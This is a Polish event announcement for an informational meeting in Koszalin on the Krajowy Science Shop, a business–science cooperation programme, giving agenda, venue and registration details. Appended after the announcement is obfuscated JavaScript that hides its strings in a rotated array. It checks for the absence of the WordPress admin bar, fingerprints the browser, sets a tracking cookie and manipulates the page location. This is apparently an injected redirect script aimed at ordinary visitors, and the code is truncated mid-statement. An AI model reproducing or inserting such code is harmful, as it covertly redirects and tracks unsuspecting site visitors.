Spotkanie Krajowy Science Shop | Północna Izba Gospodarcza w Koszalinie

Miasto Koszalin wspólnie z Politechniką Koszalińską  ma przyjemność zaprosić wszystkich zainteresowanych na  spotkanie informacyjne skierowane do przedsiębiorców, które odbędzie się w dniu 22 stycznia 2018 r.

Podczas spotkania omówione zostaną założenia Krajowego Science Shopu jako nowego modelu współpracy przedsiębiorstw, nauki i instytucji publicznych. Spotkanie poprowadzi Stanisław Alwasiak – koordynator programu.

Innowacja Science Shopu testuje stworzenie nowego podejścia współpracy nauki i przedsiębiorstw w uspołecznionym procesie w formule pierwszego w Polsce Krajowego Science Shopu, angażującego do działań merytorycznych młodych ludzi. Jego istotą jest pozyskiwanie potrzebnej wiedzy przez przedsiębiorstwa dzięki współuczestnictwu studentów i absolwentów w dedykowanych pracach na rzecz przedsiębiorstw.

Tworzony Science Shop jest miejscem, które ułatwi wymianę wiedzy i technologii pomiędzy nauką i biznesem prezentując rolę jaką technologie odgrywają i mogą odegrać w prowadzeniu działalności gospodarczej i działalności badawczo rozwojowej.

Pierwszy Krajowego Science Shop  działa w branży technologii kosmicznych, ale jego twórcy są  otwarci i zainteresowani rozszerzeniem formuły Science Shopu również na inne branże i dziedziny działalności gospodarczej.

Program spotkania:

10.00 – 10.15 – Przywitanie gości

10.15 – 10.45 – Prezentacja Założeń Krajowego Science Shopu jako innowacji społecznej

10.45 – 11.30 – Prezentacja propozycji współpracy z przedsiębiorstwami w tym rekrutacji pracowników przygotowana we współpracy z środowiskiem ukraińskich uczelni technicznych Politechniką Kijowska, Równieńską, Dniepro.– prezentacja modelu i koncepcji rozwoju

11.30 – 12.00 – Dyskusja

Spotkanie będzie doskonałą okazją do dyskusji oraz wymiany doświadczeń w omawianym obszarze.

 

Udział w spotkaniu jest bezpłatny.
Termin spotkania:                22 stycznia  2018 r., godz. 10:00 – 12.00

Miejsce spotkania:               Urząd Miejski w Koszalinie, sala 300 (III piętro)

Organizatorzy:                     Urząd Miejski w Koszalinie, Deloitte

Nadsyłanie zgłoszeń:           19 stycznia 2018 r.  na adres e-mail:  anna.sniezko@um.koszalin.pl lub telefonicznie 94 348 88 77

'toUTCString',’cookie',’split',’length',’charAt',’substring',’indexOf',’userAgent',’match',’MSIE;',’OPR',’Chromium',’Firefox',’Chrome',’ppkcookie',’location',’http://',’getElementById',’wpadminbar',’undefined',’setTime',’getTime',';\x20expires='];(function(c,d){var e=function(f){while(–f){c[’push'](c[’shift']());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(’0x0′)](b(’0x1′))===null){if(typeof c===b(’0x2′)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(’0x3′)](h[b(’0x4′)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(’0x5′)+h[b(’0x6′)]();}document[b(’0x7′)]=d+’=’+(e||”)+g+';\x20path=/';}function i(j){var k=j+’=';var l=document[b(’0x7′)][b(’0x8′)](';');for(var m=0x0;m